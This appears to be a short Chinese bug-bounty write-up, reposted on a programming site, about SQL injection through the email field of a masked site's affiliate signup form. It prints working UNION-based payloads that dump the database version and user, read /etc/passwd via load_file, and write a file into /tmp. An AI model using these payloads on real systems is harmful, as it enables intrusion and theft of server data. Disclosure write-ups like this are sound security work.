我像往常一样注册网站会员
然后通过POST方法将表单信息发送到 https://www.blablabla.com/svc/*****/form_affiliate。
这里的email参数存在 SQL 注入漏洞
于是我在请求框 [email=””]参数中插入SQL语句
' and 1=2 union all select concat_ws(0x3a,version(),user(),database())--+
结果在响应窗口显示 “5.5.41-log:root@10.130.0.1:tp_cart”。
现在我尝试使用SQL命令来读取文件
' and 1=2 union all select load_file('/etc/passwd')--+
接着尝试在/tmp目录写入文件
' and 1=2 union all select 'blablalba_bug_bounty_program' into outfile '/tmp/blablabla'--+
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 优化ElasticSearch写入效率
- golang 创建,读取,写入文件
- Kafka学习笔记 -- 写入数据
- Elasticsearch 写入原理深入详解
- 高频写入redis场景优化
- Laravel log 无法写入问题
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
JavaScript & jQuery交互式Web前端开发
[美]达克特(Duckett,J.) / 杜伟、柴晓伟、涂曙光 / 清华大学出版社 / 2015-6-9 / 79.80元
欢迎选择一种更高效的学习JavaScript和jQuery的方式。 你是一名JavaScript新手?或是您曾经向自己的Web页面上添加过一些脚本,但想以一种更好的方式来实现它们?本书非常适合您。本书不仅向您展示如何阅读和编写JavaScript代码,同时还会以一种简单且视觉化的方式,教您有关计算机编程的基础知识。阅读本书之前,您只需要对HTML和CSS有一些了解即可。 通过将编程理论......一起来看看 《JavaScript & jQuery交互式Web前端开发》 这本书的介绍吧!